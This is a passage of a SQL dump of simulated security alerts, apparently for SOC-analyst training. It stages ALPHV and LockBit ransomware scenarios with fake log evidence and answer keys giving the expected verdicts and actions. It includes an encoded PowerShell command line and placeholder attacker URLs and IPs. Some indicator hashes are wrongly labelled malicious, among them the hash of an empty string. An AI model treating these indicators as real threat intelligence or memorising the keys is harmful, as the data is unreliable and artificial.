process.\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:37:45Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"185.243.115.84\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_name\\\":\\\"lsass_dump.dmp\\\",\\\"hash\\\":\\\"3a4b55c88d2f4b6a9ccf3c4e9d6d8e4b\\\",\\\"action\\\":\\\"dumped_credentials\\\",\\\"description\\\":\\\"ALPHV actor utilized Mimikatz to dump credentials from LSASS process.\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:37:45Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"185.243.115.84\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_name\\\":\\\"lsass_dump.dmp\\\",\\\"hash\\\":\\\"3a4b55c88d2f4b6a9ccf3c4e9d6d8e4b\\\",\\\"action\\\":\\\"dumped_credentials\\\",\\\"description\\\":\\\"ALPHV actor utilized Mimikatz to dump credentials from LSASS process.\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:37:45Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"185.243.115.84\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_name\\\":\\\"lsass_dump.dmp\\\",\\\"hash\\\":\\\"3a4b55c88d2f4b6a9ccf3c4e9d6d8e4b\\\",\\\"action\\\":\\\"dumped_credentials\\\",\\\"description\\\":\\\"ALPHV actor utilized Mimikatz to dump credentials from LSASS process.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1566, 'Exfiltration: Data Leak Site Upload', 'critical', 'Data Leak Monitoring Service', 'ALPHV has uploaded sensitive data to their leak site, threatening to expose it publicly if ransom demands are not met. This critical step signifies the culmination of their data exfiltration attack, increasing pressure on the victim to comply with the ransom.', 'Data Exfiltration', 'T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:52Z\",\"event_id\":\"DL-2023-1015\",\"source_ip\":\"198.51.100.45\",\"destination_ip\":\"203.0.113.5\",\"internal_ip\":\"192.168.1.35\",\"username\":\"jdoe\",\"exfiltrated_files\":[\"confidential_data.zip\",\"financial_records.xlsx\"],\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"leak_site_url\":\"http://malicious-leak-site.com/upload\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\",\"action\":\"Upload\",\"threat_actor\":\"ALPHV\"}', '2026-03-15 19:13:33', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"Known ALPHV threat actor IP used for exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.35\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal host used for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-leak-site.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"Known leak site associated with 
ALPHV.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with exfiltrated confidential data.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal File Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file exfiltrated to leak site.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.563Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"event_id\\\":\\\"DL-2023-1015\\\",\\\"source_ip\\\":\\\"198.51.100.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_data.zip\\\",\\\"financial_records.xlsx\\\"],\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"leak_site_url\\\":\\\"http://malicious-leak-site.com/upload\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\",\\\"action\\\":\\\"Upload\\\",\\\"threat_actor\\\":\\\"ALPHV\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.563Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"event_id\\\":\\\"DL-2023-1015\\\",\\\"source_ip\\\":\\\"198.51.100.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_data.zip\\\",\\\"financial_records.xlsx\\\"],\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"leak_site_url\\\":\\\"http://malicious-leak-site.com/upload\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\",\\\"action\\\":\\\"Upload\\\",\\\"threat_actor\\\":\\\"ALPHV\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.563Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"event_id\\\":\\\"DL-2023-1015\\\",\\\"source_ip\\\":\\\"198.51.100.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_data.zip\\\",\\\"financial_records.xlsx\\\"],\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"leak_site_url\\\":\\\"http://malicious-leak-site.com/upload\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\",\\\"action\\\":\\\"Upload\\\",\\\"threat_actor\\\":\\\"ALPHV\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.563Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"event_id\\\":\\\"DL-2023-1015\\\",\\\"source_ip\\\":\\\"198.51.100.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_data.zip\\\",\\\"financial_records.xlsx\\\"],\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"leak_site_url\\\":\\\"http://malicious-leak-site.com/upload\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\",\\\"action\\\":\\\"Upload\\\",\\\"threat_actor\\\":\\\"ALPHV\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.563Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"event_id\\\":\\\"DL-2023-1015\\\",\\\"source_ip\\\":\\\"198.51.100.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_data.zip\\\",\\\"financial_records.xlsx\\\"],\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"leak_site_url\\\":\\\"http://malicious-leak-site.com/upload\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\",\\\"action\\\":\\\"Upload\\\",\\\"threat_actor\\\":\\\"ALPHV\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1567, 'Phishing Campaign Detected', 'medium', 'Email Gateway Logs', 'A phishing email was detected attempting to gain initial access to the network. The email contained a malicious attachment linked to the LockBit ransomware group.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:32:00Z\",\"email\":{\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.2.3\",\"from\":\"attacker@example.com\",\"to\":\"user@company.com\",\"subject\":\"Urgent: Update Your Account Information\",\"attachment\":{\"filename\":\"Invoice_8374.docx\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\"},\"urls\":[\"http://malicious-link.com/update\"]}}', '2026-03-15 19:15:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash known to be associated with LockBit ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address linked to phishing activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"Invoice_8374.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Filename commonly used in phishing 
campaigns.\"}},{\"id\":\"artifact_6\",\"type\":\"url\",\"value\":\"http://malicious-link.com/update\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"URL used for phishing and malware distribution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Campaign Detected\",\"date\":\"2026-03-15T20:58:15.567Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1568, 'Malicious Payload Execution', 'high', 'Endpoint Detection and Response (EDR) Alerts', 'A ransomware payload was executed on a compromised system following a successful phishing attack. Immediate action is required to prevent further damage.', 'Execution', 'T1059', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:00Z\",\"event_id\":\"EDR-Exec-12345\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"10.0.0.15\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"process_name\":\"ransomware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\ransomware.exe\",\"event_description\":\"Execution of a known ransomware payload detected on endpoint.\",\"os\":\"Windows 10\"}', '2026-03-15 19:15:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelFeed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple ransomware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash corresponds to a known ransomware variant.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ransomware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalDatabase\",\"verdict\":\"malicious\",\"details\":\"Filename commonly used in ransomware attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Compromised user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1569, 'Establishing Persistence', 'high', 'System Logs', 'LockBit ensures persistence by modifying system configurations and creating backdoors, making it challenging to remove them.', 'Persistence', 'T1547 - Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"user\":\"jdoe\",\"action\":\"Registry Modification\",\"registry_key\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\LockBit\",\"file\":\"C:\\\\Windows\\\\System32\\\\lockbit.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"description\":\"Unauthorized modification of registry to establish persistence.\",\"process_id\":\"1234\"}', '2026-03-15 19:15:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault\",\"verdict\":\"malicious\",\"details\":\"IP associated with known LockBit operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with LockBit ransomware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\LockBit\\\",\\\"file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lockbit.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Unauthorized modification of registry to establish persistence.\\\",\\\"process_id\\\":\\\"1234\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\LockBit\\\",\\\"file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lockbit.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Unauthorized modification of registry to establish persistence.\\\",\\\"process_id\\\":\\\"1234\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Registry 
Modification\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\LockBit\\\",\\\"file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lockbit.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Unauthorized modification of registry to establish persistence.\\\",\\\"process_id\\\":\\\"1234\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\LockBit\\\",\\\"file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lockbit.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Unauthorized modification of registry to establish persistence.\\\",\\\"process_id\\\":\\\"1234\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\LockBit\\\",\\\"file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lockbit.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Unauthorized modification of registry to 
establish persistence.\\\",\\\"process_id\\\":\\\"1234\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1570, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'LockBit malware is attempting lateral movement within the network by accessing multiple internal systems. Unauthorized access detected from an internal compromised host to another system.', 'Lateral Movement', 'T1570 - Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"192.168.1.20\",\"protocol\":\"SMB\",\"action\":\"Access\",\"username\":\"jdoe\",\"file_accessed\":\"\\\\\\\\192.168.1.20\\\\C$\\\\Windows\\\\System32\\\\cmd.exe\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"external_ip\":\"203.0.113.45\"}', '2026-03-15 19:15:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by a potentially compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Targeted internal system.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware activity.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"External IP associated with known malicious 
activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1571, 'Data Exfiltration in Progress', 'critical', 'Data Loss Prevention (DLP) Systems', 'Sensitive data is being exfiltrated from the internal network to an external IP address associated with known malicious activity. This is a precursor to potential ransomware encryption.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:48:32Z\",\"event_id\":\"dlp-2030\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"45.67.89.123\",\"file_name\":\"confidential_data.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"data_size\":\"2GB\",\"url\":\"https://malicious-site.com/exfil\"}', '2026-03-15 19:15:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.67.89.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with LockBit ransomware operations.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file being exfiltrated.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Hash of the exfiltrated file matches known malicious patterns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 
